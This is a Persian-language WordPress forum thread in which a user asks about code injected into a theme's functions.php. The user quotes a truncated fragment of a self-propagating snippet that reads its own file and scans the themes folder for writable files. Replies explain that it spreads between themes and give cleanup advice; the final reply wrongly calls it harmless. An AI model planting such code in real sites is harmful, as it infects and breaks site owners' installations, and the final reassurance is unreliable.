رفتن به مطلب

سوال در مورد کدای مخرب

sir1

پست های پیشنهاد شده

سلام من یک قالبو تازه خریدم. دو سه روزه که نصب کردم در فایل functions.php این کدا اضاف شده. میشه بگید مزبوط به چی هستن؟

<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

لینک به ارسال

بعضی از پوسته ها دارای کدهای مخربی هستند که میشه گفت از نسخه 3 به بعد ندیدم اما جدیدا باز باب شده

کا این خط ها پاک کنید و قالب های دیگری که در محل هستند و دارای این کد هستند پاک کنید و سطح دسترسی فانکشن روی 644 قرار دهید

لینک به ارسال

یه زحمت داشتم

کسی هست که دسترسیو بهش بدم هاستمو از فایلا و کدای مخرب بررسی کنه چون فک میکنم که هک شدم.

لینک به ارسال

هک نشدید

این کدها از پوسته های خراب خودشون منتقل میکنند به پوسته های سالم

گافیه پوسته های سالم جاگزین قدیمی ها بکنید

باز اگر نتونستید و... پ.خ بدید

لینک به ارسال

بعضی از پوسته ها دارای کدهای مخربی هستند که میشه گفت از نسخه 3 به بعد ندیدم اما جدیدا باز باب شده

کا این خط ها پاک کنید و قالب های دیگری که در محل هستند و دارای این کد هستند پاک کنید و سطح دسترسی فانکشن روی 644 قرار دهید

از کجا میگید این کدها مخرب هستند

ظاهرش این هست که برای بررسی فعال بود ویجت هست

لینک به ارسال

از کجا میگید این کدها مخرب هستند

ظاهرش این هست که برای بررسی فعال بود ویجت هست

از اونجایی که کد اتوماتیک در فانکشن تزریق میشه و در فایلی در کنار اون پوسته باشه تزریق میشه و بعد مدت کوتاهی سایت از کار میندازه و سایت بالا نمیاد

الان هر پوسته ببینید که توی محل theme بوده این کد قرار گرفته و زمانی که میخواهید پوسته عوض کنید صفحه سفید میشه

لینک به ارسال

همه قالباتون رو دانلود کنید و از توی هاست حذفشون کنید و از توی لوکال ابتدا فایل فانکشن همه قالبها رو تو notepad++ باز کنید و یکی یکی کدهای اضافه شده رو پاک کنید و فسریع همه رو ذخیره کنید ولی نبندینشون تا اگه فایلی خواست دوباره خوشو اضافه کنه نتونه و در آخر سر هم همه رو باهم ذخیره کنید و ببندید تا از شرش راحت شید.

این راه حله امتحان شده توسط خودمه

لینک به ارسال

ممنون از راهنمایی دوستان. این کدای اضافی از قالبهای رایگانی بود که قبلا استفاده میکردم و روی هاست بود. همه اون قالبارو حذف کردم. الان دیگه درست شده.

لینک به ارسال

سعی کنید سطح دسترسی فایل ها رو کم کنید تا قابل نوشتن نباشد

لینک به ارسال

به طور خودکار دسترسی تمام فایلها بر روی 644 است و من هیچ کدامشو تغییر ندادم تا قابل نوشتن باشه.

لینک به ارسال

به طور خودکار دسترسی تمام فایلها بر روی 644 است و من هیچ کدامشو تغییر ندادم تا قابل نوشتن باشه.

کدهای شما کدهای مخرب یا ... نیستن و فقط یک فانکشن هست که بیشتر شبیه فانکشنای پوسته های ووکامرس هست که به صورت خودکار اضافه میشه برای چک کردن مثلا فعال بودن سبد خرید !

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• اضافه کردن...